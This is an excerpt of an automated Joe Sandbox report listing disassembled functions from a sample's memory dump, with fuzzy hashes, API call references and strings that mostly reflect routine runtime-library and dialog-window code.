Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 0e11dfe4d490155480a81584ad41391f84da4f4a2a552622b5f5bb26c6dd6725
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: D7C163362051530EDF6D863A85341BFFFA1AAA17B131A276DD4B3CB1D5FE20E524DA20

Function 0059E2A0 Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ed959d5e9a0a46edbd4c6a9e2f1d3539e84b79baf7175fc42b533c21822d3f8
Instruction ID: f08ef57973f0e7d83172de76a00802fa9503152a9a911d38dcd82ac552157ad2
Opcode Fuzzy Hash: 9ed959d5e9a0a46edbd4c6a9e2f1d3539e84b79baf7175fc42b533c21822d3f8
Instruction Fuzzy Hash: 8FE136745093848FC314CF69D8A096ABBF0BB9A300F86495FF5D587352D335EA09DBA2

Function 005A3A3C Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
Instruction ID: aff5ffb6ddaed3235889b2688a591d9b4341ff593c9d50213eab9a728d2477b3
Opcode Fuzzy Hash: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
Instruction Fuzzy Hash: 03915A7020474A8BDB24EF68D899BBE7F95FF82308F10092DF59787282DA749A45C761

Function 005B4969 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efdd91cac16667744e7856012df626b4b6a1acff55fd1ed24a13adec933dce2c
Instruction ID: a74faf25cf863d51e8cd7d34584d7b8c9f6515f89c99dad2f7b7d4039167494f
Opcode Fuzzy Hash: efdd91cac16667744e7856012df626b4b6a1acff55fd1ed24a13adec933dce2c
Instruction Fuzzy Hash: 17617971680B0957DE388968489ABFF7F9AFB41700F140A19E582DB283D611FD82CF59

Function 005A3D6D Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
Instruction ID: 871a526106e4e745d247364fda03e939b3100f239a2621053f94abc424965fad
Opcode Fuzzy Hash: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
Instruction Fuzzy Hash: 80712C716043464FDB24DF68C8C9BAD7FE5FBD230CF10492DF9868B282DA749A858752

Function 005B473A Relevance: .2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
Instruction ID: 372b80e98a6d23acb42f16c74a2d67992baadc5b26c52fef3a3f8fe0855292c3
Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
Instruction Fuzzy Hash: 23511771600A8556DB388968885ABFF6FC9FB53300F180919F98297283DB15FD43CF92

Function 0059DE6C Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00561b637f10a3824cd893b6a6cfc76f937d1057fa736aa6d5cd2d5f27fa74d5
Instruction ID: 1dbd590bf03fdcd273cfc6f667501ac09d6685f7eec5e8e10d33d486a47f8071
Opcode Fuzzy Hash: 00561b637f10a3824cd893b6a6cfc76f937d1057fa736aa6d5cd2d5f27fa74d5
Instruction Fuzzy Hash: 1081A19221F2D49ECB269F7D38A52B53FA16737301B1D04ABC4C5C62A3E136465DE722

Function 0059E8A0 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e3192e2dcde3f525f516aefc7f155ec52cb61af434888bc894833798b6656e3
Instruction ID: 378ff5739c5775a67d9ac5dbb06cba5faae257644d19f5337a30035c38c447ca
Opcode Fuzzy Hash: 3e3192e2dcde3f525f516aefc7f155ec52cb61af434888bc894833798b6656e3
Instruction Fuzzy Hash: 3751C0319083D64FCB12CF29918946EBFE1BEDA314F49489EE4D54B262D231D649CB92

Function 0059F968 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eff440880a7314a876e37bbd281ab6bd4d1b520bc5a62fd272b272c8bec7b675
Instruction ID: be71ad0266c9bbc75d9b0a3d1430dc687676d0702303c27d2b3ee204320b8086
Opcode Fuzzy Hash: eff440880a7314a876e37bbd281ab6bd4d1b520bc5a62fd272b272c8bec7b675
Instruction Fuzzy Hash: 83512471A083068BC748CF19D48059AF7E1FF88354F058A2EE899E7741DB34EA59CB96

Function 005A37C1 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
Instruction ID: a4a48e411135f3911cac48a24eaf0b7ff862d0e0a87d6322b80331a88577a8c4
Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
Instruction Fuzzy Hash: 0731A0B16047468FCB14DF28C85666EBFE0FB96304F10492DE499C7342C639AA4ACBA1

Function 00595F3C Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a794ed6e6fb667a1245a80e718f111544f2925837ac4d101f1d6319b36d9d39b
Instruction ID: 1dcdb460ebfd1563927c3b4192e1808c11816f9dcc3219507c8c4eb5918acae7
Opcode Fuzzy Hash: a794ed6e6fb667a1245a80e718f111544f2925837ac4d101f1d6319b36d9d39b
Instruction Fuzzy Hash: B5212972A205714FCB48CF2DDCD083A7756B79A321746812BEE46CB2D1C534E92CE7A0

Function 0059DA98 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 236COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0059DABE

Part of subcall function 0059400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0059401D

Part of subcall function 005A1596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,005D0EE8,00000200,0059D202,00000000,?,00000050,005D0EE8), ref: 005A15B3

_strlen.LIBCMT ref: 0059DADF
SetDlgItemTextW.USER32(?,005CE154,?), ref: 0059DB3F
GetWindowRect.USER32(?,?), ref: 0059DB79
GetClientRect.USER32(?,?), ref: 0059DB85
GetWindowLongW.USER32(?,000000F0), ref: 0059DC25
GetWindowRect.USER32(?,?), ref: 0059DC52
SetWindowTextW.USER32(?,?), ref: 0059DC95
GetSystemMetrics.USER32(00000008), ref: 0059DC9D
GetWindow.USER32(?,00000005), ref: 0059DCA8
GetWindowRect.USER32(00000000,?), ref: 0059DCD5
GetWindow.USER32(00000000,00000002), ref: 0059DD47

Strings

CAPTION, xrefs: 0059DC77
$%s:, xrefs: 0059DAB2
d, xrefs: 0059DBA5
T\, xrefs: 0059DAFA

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$T\$d
API String ID: 2407758923-2742923714
Opcode ID: 793c17295dbc39fc6529796369525e4f6a77aeb065de22eaff67a0ee73933616
Instruction ID: 2e6a2143910ee12235f4b51ec9e9a57a9e945c18f127a48e66a7ee09439f201c
Opcode Fuzzy Hash: 793c17295dbc39fc6529796369525e4f6a77aeb065de22eaff67a0ee73933616
Instruction Fuzzy Hash: 7E817C72508341AFDB10DF68CD89E6BBBE9FB89704F04091DFA84D3291D674E909CB62

Function 005BC233 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 005BC277

Part of subcall function 005BBE12: _free.LIBCMT ref: 005BBE2F
Part of subcall function 005BBE12: _free.LIBCMT ref: 005BBE41
Part of subcall function 005BBE12: _free.LIBCMT ref: 005BBE53
Part of subcall function 005BBE12: _free.LIBCMT ref: 005BBE65
Part of subcall function 005BBE12: _free.LIBCMT ref: 005BBE77
Part of subcall function 005BBE12: _free.LIBCMT ref: 005BBE89
Part of subcall function 005BBE12: _free.LIBCMT ref: 005BBE9B
Part of subcall function 005BBE12: _free.LIBCMT ref: 005BBEAD
Part of subcall function 005BBE12: _free.LIBCMT ref: 005BBEBF
Part of subcall function 005BBE12: _free.LIBCMT ref: 005BBED1
Part of subcall function 005BBE12: _free.LIBCMT ref: 005BBEE3
Part of subcall function 005BBE12: _free.LIBCMT ref: 005BBEF5
Part of subcall function 005BBE12: _free.LIBCMT ref: 005BBF07

_free.LIBCMT ref: 005BC26C

Part of subcall function 005B84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,005BBFA7,005C3958,00000000,005C3958,00000000,?,005BBFCE,005C3958,00000007,005C3958,?,005BC3CB,005C3958), ref: 005B84F4
Part of subcall function 005B84DE: GetLastError.KERNEL32(005C3958,?,005BBFA7,005C3958,00000000,005C3958,00000000,?,005BBFCE,005C3958,00000007,005C3958,?,005BC3CB,005C3958,005C3958), ref: 005B8506

_free.LIBCMT ref: 005BC28E
_free.LIBCMT ref: 005BC2A3
_free.LIBCMT ref: 005BC2AE
_free.LIBCMT ref: 005BC2D0
_free.LIBCMT ref: 005BC2E3
_free.LIBCMT ref: 005BC2F1
_free.LIBCMT ref: 005BC2FC
_free.LIBCMT ref: 005BC334
_free.LIBCMT ref: 005BC33B
_free.LIBCMT ref: 005BC358
_free.LIBCMT ref: 005BC370

Strings

P\, xrefs: 005BC249

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: P\
API String ID: 161543041-2375622079
Opcode ID: 4248b34f128f366cb38d1d2d949d44fe33090e93065389e73458f8992af43fe3
Instruction ID: 48fcf6f6eaf9efbd0bf13a2259148714c2abf65ae54194b99882ae8d8cff0a53
Opcode Fuzzy Hash: 4248b34f128f366cb38d1d2d949d44fe33090e93065389e73458f8992af43fe3
Instruction Fuzzy Hash: 55316D316006069FEF20AA78DA4ABEABFE9FF40310F54982AE449D7551DF71BC40CB54

Function 005ACD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 005ACD51
GetClassNameW.USER32(00000000,?,00000800), ref: 005ACD7D

Part of subcall function 005A17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0059BB05,00000000,.exe,?,?,00000800,?,?,005A85DF,?), ref: 005A17C2

GetWindowLongW.USER32(00000000,000000F0), ref: 005ACD99
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 005ACDB0
GetObjectW.GDI32(00000000,00000018,?), ref: 005ACDC4
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 005ACDED
DeleteObject.GDI32(00000000), ref: 005ACDF4
GetWindow.USER32(00000000,00000002), ref: 005ACDFD

Strings

STATIC, xrefs: 005ACD83

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: ad53859933429f305957c39f8a3341bfb1f453a17af2b5a9ed33d6c930c132da
Instruction ID: c7bb25283abc7efe86f87909d244d8accc7a1af6c6a3082cc416e2f88dfde526
Opcode Fuzzy Hash: ad53859933429f305957c39f8a3341bfb1f453a17af2b5a9ed33d6c930c132da
Instruction Fuzzy Hash: 2511E4735453217BE7216B609C0EFAF3E9CFBA6741F004425FA42E9092CA688D09D6A4

Function 005B8EB1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 005B8EC5

Part of subcall function 005B84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,005BBFA7,005C3958,00000000,005C3958,00000000,?,005BBFCE,005C3958,00000007,005C3958,?,005BC3CB,005C3958), ref: 005B84F4
Part of subcall function 005B84DE: GetLastError.KERNEL32(005C3958,?,005BBFA7,005C3958,00000000,005C3958,00000000,?,005BBFCE,005C3958,00000007,005C3958,?,005BC3CB,005C3958,005C3958), ref: 005B8506

_free.LIBCMT ref: 005B8ED1
_free.LIBCMT ref: 005B8EDC
_free.LIBCMT ref: 005B8EE7
_free.LIBCMT ref: 005B8EF2
_free.LIBCMT ref: 005B8EFD
_free.LIBCMT ref: 005B8F08
_free.LIBCMT ref: 005B8F13
_free.LIBCMT ref: 005B8F1E
_free.LIBCMT ref: 005B8F2C

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9e58347356790721da788b5c02e80758b78ccef03d84017821fa4fd9e1ca6e66
Instruction ID: ff092ed56b8e541bfecca43a4cd2d0c91886bc0a25952e8778538ecd75def294
Opcode Fuzzy Hash: 9e58347356790721da788b5c02e80758b78ccef03d84017821fa4fd9e1ca6e66
Instruction Fuzzy Hash: 5C11A27650010EAFCF11EF94CA46CEA3FA9FF44354B5190A5FA088B626DA31EE51DB80

Function 00592162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON

Download Yara Rule

Strings

x%u, xrefs: 0059267A
xc%u, xrefs: 005926D7
;%u, xrefs: 00592497

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID:
String ID: ;%u$x%u$xc%u
API String ID: 0-2277559157
Opcode ID: e7d3a1b511df658277c884118234bb5657343dccbf52b3d92495cb9677db2e7f
Instruction ID: 36b7fc2d2ca1c1909a7b083663e2f8a7a730d3686af074c58ad1b2219e3e1d03
Opcode Fuzzy Hash: e7d3a1b511df658277c884118234bb5657343dccbf52b3d92495cb9677db2e7f
Instruction Fuzzy Hash: 88F1F5716042416BDF15EF78C899BEE7F99BFD1300F084969F885DF283DA649848C7A2

Function 005AACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0059130B: GetDlgItem.USER32(00000000,00003021), ref: 0059134F
Part of subcall function 0059130B: SetWindowTextW.USER32(00000000,005C35B4), ref: 00591365

EndDialog.USER32(?,00000001), ref: 005AAD20
SendMessageW.USER32(?,00000080,00000001,?), ref: 005AAD47
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 005AAD60
SetWindowTextW.USER32(?,?), ref: 005AAD71
GetDlgItem.USER32(?,00000065), ref: 005AAD7A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 005AAD8E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 005AADA4

Strings

LICENSEDLG, xrefs: 005AACE4

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: c6d7d200fb1c62fdca8723396c70af6896f4ee6800de3b71f756e5cd0f31167b
Instruction ID: 61da513c5c385c4b0d0a36ce44780cd391ad27eb44770e09166d0a211dfe70a5
Opcode Fuzzy Hash: c6d7d200fb1c62fdca8723396c70af6896f4ee6800de3b71f756e5cd0f31167b
Instruction Fuzzy Hash: 3021B172244205BBD2255B75EC4EE3F3FACFB67B46F010405F284E64A0DB666909F632

Function 00599443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00599448
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0059946B
